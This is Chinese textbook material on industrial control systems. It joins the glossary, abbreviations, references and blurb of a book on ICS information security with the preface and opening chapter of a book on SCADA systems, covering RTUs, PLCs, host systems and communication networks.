一个物理或逻辑的安全区的边缘或边界。 附录A 术语 10. 机密性 (confidentiality) 数据所具有的特性,即表示数据所达到的未提供或未泄露给非授权的个人、过程或其 他实体的程度。 11. 拒绝服务攻击 (Denial of Service) 预防或中断到系统的授权访问或拖延系统的业务和功能。 12. 完整性 (integrity) 保证信息及信息系统不会被非授权更改或破坏的特性,包括数据的完整性和系统的完 整性。 13. 组织机构 (organization) 由作用不同的个体为实施共同的业务目标而建立的结构。 一个单位是一个组织,某个 业务部门也可以是一个组织。 14. 远程终端装置 (Remote Terminal Unit,RTU) 集远方数据采集、传输、存储功能于一体的终端设备。 15. 安全区域 (security zone) 逻辑或物理资产的分组,有着共同的安全要求。 16. 威胁 (threat) 可能导致对系统或组织产生危害的不希望事故的潜在起因。 17. 脆弱性 (vulnerability) · 系统设计、实现或操作和管理中存在的缺陷或弱点,可被利用来危害系统的完整性或 安保策略。 附录 B 缩 略 语 AH APC APT CA CL CMM CNVD COTS CPS CRT DCOM DCS DES DMZ DoS EDSA EML EMS ERP ESP FCS FR FSA FTP GRC HSE HTTP ICS/IACS ICS-SMS IDS IED 认证头 (Authentication Header) 先进控制系统 (Advanced Process Control) 高级持续性威胁 (Advanced Persistence Threat) 认证机构 (Certificate Authority) 能力等级 (Capability Level) 协同制造模式 (Collaborative Manufacturing Model) 国家信息安全漏洞共享平台 (China National Vulnerability Database) 商业现有产品 (Commercial off the Shelf) 信息物理系统 (Cyber Physical System) 通信健壮性测试 (Communication Robustness Testing) 分布式组件对象模型 (Distributed Component Object Model) 分散型控制系统 (Distributed Control System) 数据加密标准 (Data Encryption Standard) 隔离区 (DeMilitarized Zone) 拒绝服务攻击 (Denial of Service) 嵌入式设备安全保障认证 (Embedded Device Security Assurance) 可扩充标记语言 (Extensible Markup Language) 能量管理系统 (Energy Management System) 企业资源计划 (Enterprise Resource Planning) 封装安全荷载 (Encapsulation Security Payload) 现场总线控制系统 (Fieldbus Control System) 基本要求 (Foundation Requirement) 功能安全性评估 (Functional Security Assessment) 文件传输协议 (File Transfer Protocol) 管控、风险与符合性管理 (Governance,Risk and Compliance Management) 健康、安全和环境 (Health,Safety and Environment) 超文本传输协议 (Hypertext Transfer Protocol) 工 业 控 制 系 统 (Industrial Control System/Industrial Automation and Control System) 工业控制系统信息安全管理体系 (ICS Security Management System) 入侵检测系统 (Intrusion Detection System) 智能电子设备 (Intelligent Electronic Device) IEEE IKE IPS IPSec ISA ISCI IT LAN L2TP MES ML MPLS NIST OPC OS OSI PCS PIMS PLC PPTP RAS RE RISI RMS RPC RTU SCADA SCP SDSA SFTP SIS SL SMTP SNMP SR SSL TFTP TLS 附录 B 缩略语 电气与电子工程师协会(Institute of Electrical and Electronics Engineers) 互联网密钥交换 (Internet Key Exchange) 入侵防御系统 (Intrusion Prevention System) 因特网协议安全 (Internet Protocol Security) 国际自动化协会(International Society of Automation) ISA 安全符合性研究院 (ISA Security Compliance Institute) 信息技术 (Information Technology) 局域网 (Local Area Network) 第二层隧道协议 (Layer2 Tunneling Protocol) 制作执行系统 (Manufacturing Execution System) 管理等级 (Management Level) 多协议标记交换 (Multi-Protocol Label Switching) 美国国家标准与技术研究院(National Institute of Standards and Technology) 用于过程控制的对象连接与嵌入 (OLE for Process Control) 操作系统 (Operating System) 开放系统互连 (Open Systems Interconnection) 过程控制系统 (Process Control System) 工厂信息管理系统 (Plant Information Management System) 可编程逻辑控制器 (Programmable Logic Controller) 点对点隧道协议 (Point to Point Tunneling Protocol) 远程访问系统 (Remote Access System) 增强要求 (Requirement Enhancement) 工业安全事件信息库 (Repository of Industrial Security Incidents) 远程维修系统 (Remote Maintenance System) 远程过程调用协议 (Remote Procedure Call) 远程终端装置 (Remote Terminal Unit) 数据采集与监视控制系统 (Supervisory Control and Data Acquisition) 安全文件复制 (Secure Copy) 软件开发安全性评估 (Software Development Security Assessment) 安全文件传输协议 (Secure FTP) 安全仪表系统 (Safety Instrumented System) 信息安全等级 (Security Level) 简单邮件传送协议 (Simple Mail Transfer Protocol) 简单网络管理协议 (Simple Network Management Protocol) 系统要求 (System Requirement) 安全套接字层 (Secure Sockets Layer) 一般的文件传输协议 (Trivial File Transfer Protocol) 传输层安全协议 (Transmission Layer Safety) TCP 传输控制协议 (Transmission Control Protocol) TCP/IP 传输控制协议/互联网互联协议 (Transmission Control Protoco/Internet Protocol) USB 通用串行总线 (Universal Serial Bus) VLAN 虚拟本地网 (Virtual Local Area Network) VPN 虚拟专用网 (Virtual Private Network) WAN 广域网 (Wide Area Network) 参 考 文 献 [1]Keith Stouffer,Suzanne Lightman,etc.Guide to Industrial Control System(ICS) Security Revision 2 Initial Public Draft[M],NIST SP800-82,2014. [2]GB/T 30976.1-2014 工业控制系统信息安全第1 部分:评估规范[S]. 北京:中国 标准出版社,2014. [3]GB/T 30976.2-2014 工业控制系统信息安全第2部分:验收规范[S]. 北京:中国 标准出版社,2014. [4]GB/T 50770-2013 石油化工安全仪表系统设计规范[S]. 北京:中国计划出版社, 2013. [5]IEC 62443-1-1 Security for Industrial Automation and Control Systems. Part 1-1 Terminology,Concepts,and Models[S],IEC,2013. [6]IEC 62443-2-1 Security for Industrial Automation and Control Systems. Part 2-1 Industrial Automation and Control System Security Management System[S],IEC,2012. [7]IEC 62443-2-3 Security for Industrial Automation and Control Systems. Part 2-3 Patch Management in the IACS Environment[S],IEC,2013. [8]IEC 62443-3-3 Security for Industrial Automation and Control Systems. Part 3-3 System Security Requirements and Security Levels[S],IEC,2013. [9]欧阳劲松,丁露.IEC 62443工控网络与系统信息安全标准综述[J]. 信息技术与标 准化,2012年第3期.. [10]王玉敏.IEC 62443 系列标准概述和 SAL 介绍[J]. 仪器仪表标准化与计量,2012 年第2期 . [11]张红旗,王鲁,等.信息安全技术[M]. 北京:高等教育出版社,2008. [12]张玉清.网络攻击与防御技术[M]. 北京:清华大学出版社,2011. [13]徐国爱,张淼,等.网络安全(第2版)[M]. 北京:北京邮电大学出版社,2007. [14]陈克非,黄征,等.信息安全技术导论[M]. 北京:电子工业出版社,2007. [15]缪学勤.Industry 4.0 新工业革命与工业自动化转型升级[J]. 石油化工自动化, 2014年第2期. [16]杜品圣.智能工厂——德国推进工业4.0 战略的第一步(上)[J]. 自动化博览, 2014年第1期. [17]杜品圣.智能工厂——德国推进工业4.0 战略的第一步(下)[J]. 自动化博览, 2014年第2期. [18]刘鑫.我国工业控制自动化技术的现状与发展趋势[J]. 电气时代,2003年第12期. 内容简介 随着现代社会发展的迅速工业化和信息化,工业控制系统越来越多地采 用信息技术和通信技术,工业控制系统信息安全面临严峻的挑战。本书简 洁、全面地介绍了工业控制系统信息安全的概念和标准体系,系统地介绍了 工业控制系统架构与漏洞分析,并且系统地阐述了工业控制系统信息安全的 技术与方案部署、风险评估、生命周期、管理体系、项目工程、产品认证, 工业控制系统的入侵检测与防护、补丁管理,工业控制系统信息安全软件与 监控。本书以工业控制系统信息安全应用为导向,内容阐述深入浅出,问题 分析清晰透彻,除了系统地介绍相关技术与理论外,还有具体的工业控制系 统信息安全应用举例,并且对未来进行了展望,可进一步加深读者对内容的 理解和掌握。 本书可作为广大从事工业控制系统信息安全管理工程设计、应用开发、 部署与管理工作的高级技术人员的参考书,也可作为高等院校工业自动化、 计算机科学与技术、信息安全等相关专业的本科高年级学生、研究生的参 考书。
standards
工业控制系统及应用-SCADA系统应用篇 前言 典型的工业控制系统包括集散控制系统(DCS)和监控与数据采集系统(SCADA)。SCADA是英文“Supervisory Control And Data Acquisition”的简称,翻译成中文就是“监督控制与数据采集”,有些文献也称为“监视控制与数据采集”。一般来讲,SCADA系统特指分布式计算机测控系统,主要用于测控点十分分散、分布范围广泛的生产过程或设备的监控,在通常情况下,测控现场是无人或少人值班,如城市排水泵站远程监控系统、城市煤气管网远程监控、电力行业调度自动化等。SCADA系统在硬件上不如DCS或FCS等系统紧凑和专用,但其系统更加开放和多样,组成更加灵活。SCADA系统在控制层面上至少具有两层结构及连接两个控制层的通信网络,这两层结构是处于测控现场的数据采集与控制终端设备(通常称为下位机——Slaver Computer)和位于中控室的集中监视、管理及远程监控计算机(上位机——Master Computer)。 由于SCADA系统的应用领域极其广泛,而不同应用领域的特点和监控要求又导致SCADA系统解决方案的多样性和行业应用特征属性,从而导致对SCADA系统的认识有所不同。但不论在哪个领域应用,用户对SCADA系统的功能要求是一致的。从其名称可以看出,它包含两个层次的基本功能:数据采集和监督控制。因而,SCADA系统在系统结构、功能、开发工具等方面是有许多共性的,本书正是针对性地介绍SCADA系统中的这些共性内容,特别是近些年来控制领域出现的一些新的技术和规范。 《工业控制系统及应用——SCADA系统篇》共有9章,各章主要内容介绍如下。 第1章是SCADA系统概述,主要介绍什么是SCADA系统,系统组成、功能、特点及其应用,对SCADA系统与DCS和PLC也进行了比较,对控制系统功能安全与信息安全做了概述性介绍。 第2章是数据通信与网络技术,主要介绍SCADA系统中常用的通信手段和技术,由于SCADA系统广泛用于测控点较为分散、测控设备分布范围广的领域,因此,实现通信的手段和技术很多,涵盖了目前主流的有线与无线通信。 第3章是I/O接口与数据采集技术,主要介绍了数据采集中有关输入/输出接口知识、SCADA系统中常用的数据采集方法与编程、基于Internet的数据采集等。 第4章是工业控制编程语言标准IEC61131-3及基于PC的控制技术,主要介绍了该标准的产生、特点、基本内容,特别是对公共元素和编程语言做了比较系统的介绍,最后还介绍了几种支持该标准的软件产品。由于基于PC的控制技术普通采用IEC61131-3标准的编程语言,因此,在本章也对这种控制技术做了介绍。 第5章是工业控制组态软件,主要介绍组态软件的产生和发展历史、组态软件的主要功能和组成、主流的组态软件产品及嵌入式组态软件技术,对采用组态软件开发SCADA系统人机界面也做了详细介绍。 第6章是工业控制数据交换标准—OPC规范,主要介绍OPC规范的产生、特点、主要内容、OPC的体系结构和OPC服务器与客户程序开发及应用,对OPC UA规范也做了介绍,最后给出了OPC规范在工控系统模拟仿真中的应用案例。 第7章是工业控制系统功能安全与信息安全,除了介绍经典的功能安全特别是安全仪表系统的内容外,还重点介绍了近年来受到极大重视的工控系统信息安全,对其产生的根源、工控系统脆弱性、工控系统安全防护技术等做了详细分析。 第8章是SCADA系统设计与开发,主要介绍SCADA系统开发的原则、步骤、控制策略与PID算法、调试与运行、可靠性设计及抗干扰措施等。 第9章是SCADA系统应用案例分析,介绍了几个富有特色的应用案例。 这9章内容中,第1章内容是SCADA系统概述,第3、4章与SCADA系统下位机关系比较紧密,而第5章与上位机关系紧密,第2、6章属于SCADA系统中的上、下位机通信内容,第7章属于SCADA系统安全相关的内容,这些内容都是属于SCADA系统开发中的关键技术。第8章是关于SCADA系统集成技术;而第9章是案例分析,综合利用了前8章的内容。除了第9章外,在第2章~第7章也都有相应的实例。 本书作者长期从事工业控制系统、工控信息安全相关的教学、科研与工程实践,结合作者在实践中的经验、体会,以及SCADA系统相关技术的发展和大量相关的技术文献,编写了本书。 本书由华东理工大学信息学院王华忠和中国信息安全测评中心陈冬青编著。作者感谢两个单位和同事的支持。感谢北京亚控科技、美国OPTO 22、研华科技、上海宝昌自动化等公司提供的技术资料。在编写过程中还参考了许多线上和线下资料,在此也向有关作者表示感谢。 为便于教学,凡采用本书作为教材的,作者免费提供电子教案,可在华信教育资源网(www.hxedu.com.cn)查找本书下载。 由于时间和作者的水平所限,本书疏漏在所难免,恳请读者提出批评建议,以便进一步修订。同时欢迎大家交流讨论,作者的E-mail是hzwang@ecust.edu.cn。 编著者 2016年10月 第1章 SCADA系统概述 1.1 SCADA系统的概念 SCADA是英文“Supervisory Control And Data Acquisition”的简称,直译成中文就是“监督控制与数据采集”,有些文献也简称为监控系统。国内还有文献翻译成“数据采集与监视控制”。但英文“supervisory”本身不含有“视”的意思,而是监督、管理的含义,因此,把SCADA翻译成“监督控制与数据采集”更加准确。当然,SCADA系统的监控功能是通过人机界面来实现的,即操作人员可以通过人机界面监视被控系统的运行。从SCADA系统名称可以看出,其包含两个层次的基本功能:数据采集和监控。图1.1所示为一个大型油田的SCADA系统,该系统包括位于井口的现场控制层设备(如RTU或PLC)、转接站监控子系统、联合站计算机控制系统(通常采用集散控制系统)和油田中心站监控系统。这种结构在其他类似的各种监控系统中经常可以看到,如城市公用事业(自来水、污水、雨水、燃气)远程监控系统、油气远距离输送控制系统、电力调度自动化系统、交通自动监控系统、通信基站远程监控系统等。 目前对SCADA系统无统一的定义,一般来讲,SCADA系统特指分布式远程计算机测控系统,主要用于测控点十分分散、分布范围广泛的生产过程或设备的监控,通常情况下,测控现场是无人或少人值守。SCADA系统在控制层面上至少具有两层结构以及连接这两层子系统的通信网络,这两层子系统是处于测控现场的数据采集与控制终端设备(通常称为下位机——Slave Computer)和位于中控室的集中监视、管理和远程监控计算机(上位机——Master Computer或Master Terminal Unit)。复杂的SCADA系统可以有多个现场监控中心,每个监控中心与一定数量的现场控制站通信,完成一定范围内设备监控。上一层的调度中心再和现场监控中心通信,对整个现场设备进行远程监控,对整个被控设备、过程进行集中管理。如长距离油气管道远程输送监控系统,就是这样的系统类型。对于重要的远程监控系统,如西气东输SCADA系统这样的关键基础设施工控系统,除了具有常规的现场控制系统,以及多个监控中心外,在通信层还会采取冗余措施以提高系统的可用性,在现场站点还会采用安全仪表系统以降低事故风险从而提高安全性,对于通信系统还进行加密以确保数据的保密性等。 参考国内外的一些文献,这里作者给出一个SCADA系统的定义:SCADA系统是一类功能强大的计算机远程监督控制与数据采集系统,它综合利用了计算机技术、控制技术、通信与网络技术,完成了对测控点分散的各种过程或设备的实时数据采集,本地或远程的自动控制,以及运行过程的全面实时监控、管理、安全控制和故障诊断,并为上级MES系统提供必要的数据接口和支持。 近年来,随着网络技术、通信技术特别是无线通信技术的发展,SCADA系统在结构上更加分散,通信方式更加多样,系统结构从C/S(客户机/服务器)架构向B/S(浏览器/服务器)与C/S混合的方向发展,各种通信技术如数传电台、GPRS、PSTN、VPN、卫星通信等得到更加广泛的应用。 虽然可以采用一台计算机配接各种I/O卡件,并且运行自行开发的应用软件也可以实现数据采集与监控,但这类最小规模的系统并不是本书重点要介绍的。当然,本书介绍的内容也同样可以帮助开发这种小型的SCADA系统。 1.2 SCADA系统的组成 SCADA系统作为生产过程和事务管理自动化最为有效的计算机软硬件系统之一,它包含3个部分:第一个是分布式的数据采集系统,也就是通常所说的下位机;第二个是过程监控与管理系统,即上位机;第三个是数据通信网络,包括上位机网络系统、下位机网络,以及将上、下位机系统连接的通信网络。典型的SCADA系统的结构如图1.2所示。SCADA系统的这三个组成部分的功能不同,但三者的有效集成则构成了功能强大的SCADA系统,完成对整个过程的有效监控。SCADA系统广泛采用“管理集中、控制分散”的集散控制思想,因此,即使上、下位机通信中断,现场的测控装置仍然能正常工作,确保系统的安全和可靠运行。以下分别对这3个部分的组成、功能等作介绍。 1.2.1 下位机系统 下位机一般来讲都是各种智能节点,这些下位机都有自己独立的系统软件和由用户开发的应用软件。该节点不仅完成数据采集功能,而且还能完成设备或过程的直接控制。这些智能采集设备与生产过程各种检测与控制设备结合,实时感知设备各种参数的状态,各种工艺参数值,并将这些状态信号转换成数字信号,并通过各种通信方式将下位机信息传递到上位机系统中,并且接受上位机的监控指令。典型的下位机有远程终端单元RTU、可编程控制器PLC、近年才出现的PAC和智能仪表等。 1.远程终端单元RTU RTU(Remote Terminal Unit,RTU)是安装在远程现场的电子设备,用来监视和测量安装在远程现场的传感器和设备。RTU将测得的状态或信号转换成可在通信媒体上发送的数据格式。它还将从中央计算机发送来的数据转换成命令,实现对设备的远程监控。许多工业控制厂家生产各种形式的RTU,不同厂家的RTU通常自成体系,即他们有自己的组网方式和编程软件,开放性较差。 远程测控终端RTU作为体现“测控分散、管理集中”思路的产品从20世纪80年代起介绍到中国并迅速得到广泛的应用。它在提高信号传输可靠性、减轻主机负担、减少信号电缆用量、节省安装费用等方面的优点也得到用户的肯定。 RTU的主要作用是进行数据采集及本地控制,进行本地控制时作为系统中一个独立的工作站,这时RTU可以独立地完成连锁控制、前馈控制、反馈控制、PID等工业上常用的控制调节功能;进行数据采集时作为一个远程数据通信单元,完成或响应本站与中心站或其他站的通信和遥控任务。RTU的主要配置有CPU模板、I/O(输入/输出)模板、通信接口单元,以及通信机、天线、电源、机箱等辅助设备。RTU能执行的任务流程取决于下载到CPU中的程序,CPU的程序可用工程中常用的编程语言编写,如梯形图、C语言等。I/O模板上的I/O通道是RTU与现场信号的接口,这些接口在符合工业标准的基础上有多种样式,满足多种信号类型。I/O模板一般都插接在RTU的总线板槽上,通过总线与CPU相连。这种结构易于I/O模板的更换和扩展。除I/O通道外,RTU的另一个重要的接口是RTU的通信端口,RTU具有多个通信端口,以便支持多个通信链路。与常用的工业控制设备PLC相比,RTU具有如下特点: (1)同时提供多种通信端口和通信机制。RTU产品往往在设计之初就预集成了多个通信端口,包括以太网和串口(RS-232/RS-485)。这些端口满足远程和本地的不同通信要求,包括与中心站建立通信,与智能设备(流量计、报警设备等)以及就地显示单元和终端调试设备建立通信。通信协议采用Modbus RTU、Modbus ASCII、Modbus TCP/IP等标准协议,具有广泛的兼容性。同时通信端口具有可编程特性,支持对非标准协议的通信定制。 (2)提供大容量程序和数据存储空间。从产品配置来看,PLC提供的程序和数据存储空间往往只有6~13KB,而RTU可提供1~32MB的大容量存储空间。RTU的一个重要的产品特征是能够在特定的存储空间连续存储/记录数据,这些数据可标记时间标签。当通信中断时RTU就地记录数据,通信恢复后可补传和恢复数据。 (3)高度集成的、更紧凑的模块化结构设计。紧凑的、小型化的产品设计简化了系统集成工作,适合无人值守站或室外应用的安装。高度集成的电路设计增加了产品的可靠性,同时具有低功耗特性,简化备用供电电路的设计。图1.3所示为北京安控科技公司的一体化和模块化RTU产品。 (4)更适应恶劣环境应用的品质。PLC要求环境温度在0~55℃,安装时不能放在发热量大的元件下面,四周通风散热的空间应足够大。为了保证PLC的绝缘性能,空气的相对湿度应小于85%(无凝露)。否则会导致PLC部件的故障率提高,甚至损坏。RTU产品就是为适应恶劣环境而设计的,通常产品的设计工作环境温度为-40~60℃。某些产品具有DNV(船级社)等认证,适合船舶、海上平台等潮湿环境应用。 正是由于RTU完善的功能,使得RTU产品在SCADA系统中得到了大量的应用。国内外有许多公司从事相关产品的研发和生产。如美国SIXNET公司的VersaTRAK IPm、SiteTRAK RTU、RemoteTRAK RTU等系列产品;美国艾默生过程管理公司的ROC800、FB107;美国Motorola公司的MOSCAD远程终端;美国OPTO 22公司的OPTOMUX及SNAP;澳大利亚埃波罗(ELPRO)公司的EP105一体化RTU等;北京安控科技股份有限公司的Super E40、E50;北京华迅通信电子技术公司的eNET无线RTU等。 VersaTRAK IPm是最高级的RTU控制器,具有强大的通信功能和编程能力。VersaTRAK IPm内嵌Linux系统,具有源码开放的优点,而控制器的所有应用无需了解Linux。VersaTRAK IPm与SIXNET的其他RTU控制器完全兼容。用户原有的ISaGRAF程序无需更改即可应用。 艾默生ROC800是基于微处理技术的远程控制器,它可以满足各种现场自动化应用功能。可扩展的ROC800可以对站场及远程设备进行远程监视、测量和控制;能够满足需要流量计算、PID闭环控制和逻辑顺序控制的应用场合。ROC800的背板支持中央处理单元(CPU)、电源输入模块、通信模块和各种I/O模块。ROC800可以通过最多4个I/O扩展基架进行扩展。每一个扩展基架带1个背板和6个I/O插槽。当选用了全部4个扩展基架时,ROC800能最多扩展至27个插槽。 2.各种中、小型PLC 典型的小型PLC产品有三菱的FX2N系统PLC、西门子的S7-200系统、OMRON的CPM1A等。一些中、大型的SCADA系统的下位机会选用中型的PLC产品,如三菱的Q系列、西门子的S7-300、A-B公司的ControlLogix和施耐德的Quantum系列等。由于这些产品性价比高、可靠性高、编程方便,因此,在各种SCADA系统中得到广泛的应用。随着现场总线技术的发展,现场总线在以PLC为下位机的系统中应用也不断增长。图1.4所示为西门子公司的PLC产品。 3.可编程自动化控制器(Programmable Automation Controller,PAC) 作为一种开放型的自动化控制设备,目前的PAC产品主要包括两类,一类是以研华公司等代表的产品,这些公司进入控制器市场时间不长,没有PLC的生产经验,属于控制器市场的后来者。这类公司利用基于PC的控制思想和控制系统编程语言标准化的机会,推出了PAC产品来抢占控制器市场,典型的产品有研华公司的ADAM-5510EKW、Beckoff公司的CX1000、NI公司的Compact FieldPoint、泓格科技的WinCon/LinCon系列和μPAC-7186EX等。另外一类PAC厂家是传统的PLC制造商,这些公司直接把他们的高端PLC就称为PAC,典型的产品有通用电气公司的PAC SystemsRX3i/7i、罗克韦尔公司的CompactLogix和ControlLogix等。当然,这些厂家也注重这类产品的开放性,如其配套编程软件也能更好地支持IEC61131-3编程语言标准。 4.智能仪表 城市公用事业系统如水、电、气的远程监控,热电企业的热网计量与蒸汽计量的远程监控也大量采用SCADA系统。与其他一些工业过程的SCADA系统相比,它们更加侧重数据采集、信息集中管理与远程监管,而远程控制功能要求较低。在这类SCADA系统中,大量使用各种现场仪表做下位机,如智能流量计量表、冷量热量表、智能巡检仪等。还可以采用各种智能控制仪表与传统模拟仪表配套进行计量。采用智能控制仪表后,下位机系统具有更强的控制功能,若不需要控制功能,可以采用具有通信接口的现场仪表直接作为下位机。 不管选用何种形式的下位机,其地位和作用是一样的,它们与生产过程各种检测与控制设备结合,实时感知设备各种参数的状态,各种工艺参数值,并将这些状态信号转换成数字信号,并通过特定数字通信或数字网络传递到上位机系统中;同时,下位机也可根据预先编写的控制程序,完成现场设备的控制。 由于SCADA系统中上、下位机的通信可能中断,因此要求下位机系统具有自主控制能力。此外,对于I/O模块,也要求具有安全值设置等功能。如PLC和一些RTU的I/O模块可以设置初始状态,或程序停止运行时的输出状态。这些功能在目前许多总线式I/O模块中也得到了体现,如泓格7000系列部分I/O模块,除了可以设置RS-485通信中断时的安全数值外,还可以设定模块上电值,这些措施不仅可以增强现场控制单元的自主性,而且提高了控制的可靠性。 1.2.2 上位机系统(监控中心) 1.上位机系统组成 国外文献常称上位机为“SCADA Server”或MTU(Master Terminal Unit)。上位机系统通常包括SCADA服务器、工程师站、操作员站、Web服务器等,这些设备通常采用以太网联网。实际的SCADA系统上位机系统到底如何配置还要根据系统规模和要求而定,最小的上位机系统只要有一台PC即可。为了提高可靠性,上位机系统还可以实现冗余,即配置两台SCADA服务器,当一台出现故障时,系统自动切换到另外一台工作。上位机通过网络与在测控现场的下位机通信,并以各种形式,如声音、图形、报表等方式显示给用户,以达到监视的目的。同时数据经过处理后,告知用户设备的状态(报警、正常或报警恢复),这些处理后的数据可能会保存到数据库中,也可能通过网络系统传输到不同的监控平台上,还可能与别的系统(如MIS、GIS)结合形成功能更加强大的系统;上位机还可以接受操作人员的指示,将控制指令发送到下位机中,以达到远程控制的目的。 对结构复杂的SCADA系统,可能包含多个上位机系统。即系统除了有一个总的监控中心外,还包括多个分监控中心。如对于西气东输监控系统这样的大型系统而言,就包含多个地区监控中心,它们分别管理一定区域的下位机。采用这种结构的好处是系统结构更加合理,任务管理更加分散,可靠性更高。每一个监控中心通常由完成不同功能的工作站组成一个局域网,这些工作站包括: (1)数据库服务器—负责收集从下位机传送来的数据,并进行汇总。 (2)网络服务器—负责监控中心的网络管理及与上一级监控中心的连接。 (3)操作员站—在监控中心完成各种管理和控制功能,通过组态画面监测现场站点,使整个系统平稳运行,并完成工况图、统计曲线、报表等功能。操作员站通常是SCADA客户端。 (4)工程师站—对系统进行组态和维护,修改控制逻辑等。 2.上位机系统功能 通过完成不同功能计算机及相关通信设备、软件的组合,整个上位机系统可以实现如下功能。 1)数据采集和状态显示 SCADA系统的首要功能就是数据采集,即首先通过下位机采集测控现场数据,然后上位机通过通信网络从众多的下位机中采集数据,进行汇总、记录和显示。通常情况下,下位机不具有数据记录功能,只有上位机才能完整地记录和保持各种类型的数据,为各种分析和应用打下基础。 上位机系统通常具有非常友好的人机界面,人机界面可以以各种图形、图像、动画、声音等方式显示设备的状态和参数信息、报警信息等。 2)远程监控 SCADA系统中,上位机汇集了现场的各种测控数据,这是远程监视、控制的基础。由于上位机采集数据具有全面性和完整性,监控中心的控制管理也具有全局性,能更好地实现整个系统的合理、优化运行。特别是对许多常年无人值守的现场,远程监控是安全生产的重要保证。 远程监控的实现不仅表现在管理设备的开、停及其工作方式,如手动还是自动,还可以通过修改下位机的控制参数来实现对下位机运行的管理和监控。 3)报警和报警处理 SCADA系统上位机的报警功能对于尽早发现和排除测控现场的各种故障,保证系统正常运行起着重要作用。上位机上可以以多种形式显示发生的故障的名称、等级、位置、时间和报警信息的处理或应答情况。上位机系统可以同时处理和显示多点同时报警,并且对报警的应答做记录。 4)事故追忆和趋势分析 上位机系统的运行记录数据,如报警与报警处理记录、用户管理记录、设备操作记录、重要的参数记录与过程数据的记录对于分析和评价系统运行状况是必不可少的。对于预测和分析系统的故障,快速地找到事故的原因并找到恢复生产的方法是十分重要的,这也是评价一个SCADA系统其功能强弱重要的指标之一。 5)与其他应用系统的结合 工业控制的发展趋势就是管控一体化,也称为综合自动化,典型的系统架构就是ERP/ MES/PCS三级系统结构,SCADA系统就属于PCS层,是综合自动化的基础和保障。这就要求SCADA系统是开放的系统,可以为上层应用提供各种信息,也可以接收上层系统的调度、管理和优化控制指令,实现整个企业的综合自动化。 3.工控机或商用机 上位机系统硬件组成主要有计算机、服务器、网络与通信设备等。这里讨论一下上位机系统的计算机到底选用工控机还是商用计算机。 在SCADA系统发展初期,上位机系统普遍采用工控机。因为工控机在商用计算机上进行了改装与加固,以适应工业应用的要求,主要体现在: (1)结构设计更合理—与商用机相比,多数工控机都具有无源底板,将商用机的底板功能采用CPU卡件的形式实现。普遍使用全钢结构的标准机箱,机箱上带有滤网、减振和加固压条等装置;配备多个冷却风扇,并使得机箱内部保持空气正压。 (2)可靠性高—工控机对主要的硬件设备,如电源、主板、机箱等都采取了特别的强化措施,其平均无故障实际可以达到数万小时。 (3)适应恶劣环境—工控机在电磁干扰严重、电源电压波动较大、振动、温度变化较大及粉尘较多的恶劣环境下都能够正常运行。 然而,近年来,随着商用机可靠性的不断增强,以及商用机与工控机之间较大的价格差距,SCADA系统选用商用机做上位机已经十分普遍。对于可靠性要求高的场合,可以通过热备等方式来实现。由于工作人员通过操作员站实现对监控操作,这就要求操作员站及其系统软件应当具有高稳定性和可靠性,能够快速的从故障中恢复过来。目前普通使用工作站作为操作员站主机,配置高性能 CPU、内存、 RAID10 冗余硬盘结构以及光盘驱动器等大容量外部数据存储设备。 1.2.3 通信网络 通信网络实现SCADA系统的数据通信,是SCADA系统的重要组成部分。与一般的过程监控相比,通信网络在SCADA系统中扮演的作用更为重要,这主要因为SCADA系统监控的过程大多具有地理分散的特点,如无线通信机站系统的监控。在一个大型的SCADA系统中,包含多种层次的网络,如设备层总线,现场总线;在控制中心有以太网;而连接上、下位机的通信形式更是多样,既有有线通信,也有无线通信,有些系统还有微波、卫星等通信方式。 1.2.4 检测和执行设备 检测和执行设备从属于下位机系统,由于在SCADA系统中起重要作用,这里单独做一些介绍。 1.检测仪表 SCADA系统中监控的参数按照数据类型可以分为模拟量、数字量和脉冲量等,模拟量包括温度、压力、物位、流量等典型过程参数和其他各种参数,而数字量包括设备的启/停状态等。不同的应用中,检测的参数类型相差很大。如在环境监控中,要大量采用各种分析仪表进行环境参数分析;在电力系统中,则要检测电流、电压、功率等参数。为了实现对这些参数的检测与监控,首先通过各种检测仪表把这些参数转换为电量信号,再把仪表输出与计算机的各种I/O接口连接,从而最终实现把模拟量转换为数字量并被计算机采集。为了简化检测仪表与各种I/O设备的连接,通常要求检测仪表的输出是各种标准信号,如对于模拟量采用4~20mA的标准电流信号,这些信号十分适合远传。如果仪表输出的不是标准信号,可以通过相应的变送器将检测仪表输出信号转换为标准信号。相比较而言,数字量的输入/输出要简单得多,实现起来较容易。 检测仪表在组成上包括检测元件(敏感元件或传感器)和转换电路。检测元件直接响应工艺变量,并转换为一个与之成对应关系的输出信号,这些信号可以是位移、电压、电流、电阻、电荷、频率、光量、热量等。如热电偶测温时,将被测温度转换为热电势信号;热电阻测温时,将被测温度转换为电阻信号。 通常要根据工艺要求、测量精度、量程、仪表的使用环境、维护、备件等来进行仪表选型。由于技术的发展,新型仪表不断出现,许多过去难以测量的变量现在可以有较好的解决方案。目前在仪表选型上的一个趋势是,由于非接触式检测仪表具有的许多突出特性,它们的应用越来越多。 2.执行设备 执行设备接受下位机(控制器)的输出,改变操纵变量,使生产过程按照预定要求正常运行。在不同的行业中,执行器类别不一样,如在生产过程监控中,各种气动执行器得到广泛应用,典型的就是调节阀,还有各种开关阀门。而在制造业中,各种步进电机、变频器、伺服电机等调速设备得到广泛应用。几种类型的执行器及其特点如表1.1所示。 表1.1 气、电、液执行机构比较 1.3 SCADA系统典型结构 SCADA系统的发展经历了集中式SCADA系统阶段、分布式SCADA系统阶段和网络式SCADA系统三个阶段。与集中式SCADA系统结构对应的是所有的监控功能依赖于一台主机(mainframe),采用广域网连接现场RTU和主机。网络协议比较简单,开放性差,功能较弱。分布式SCADA系统充分利用了局域网技术和计算机PC化的成果,可以配置专门的通信服务器,SCADA服务器和操作站,操作站采用组态软件开发人机界面。网络化SCADA系统以各种网络技术为基础,控制结构更加分散化,信息管理更集中。系统普遍以客户机/服务器(C/S)和浏览器/服务器结构(B/S)为基础,多数系统结构上包含这两者结构,但以C/S结构为主,B/S结构主要是为了支持Internet应用,以满足远程监控的需要。与第二代SCADA系统相比,第三代SCADA系统在结构上更加开放,兼容性更好,可以无缝集成到全厂综合自动化系统中。 由于SCADA系统的规模可以从几百点到几万点,用户对SCADA系统的需求是多样的,因此对其系统架构提出了很高的要求。SCADA系统应该具有良好的可扩展性,其系统架构能够灵活构建,可以适应从单机应用到多机多网等多种功能。例如,最简单的SCADA系统为单网单机,即一台计算机可以完成所有的功能。比较复杂的系统是多网多机系统,这样的系统既可以完成所有的SCADA功能,又可以保障其可靠性、容错性。 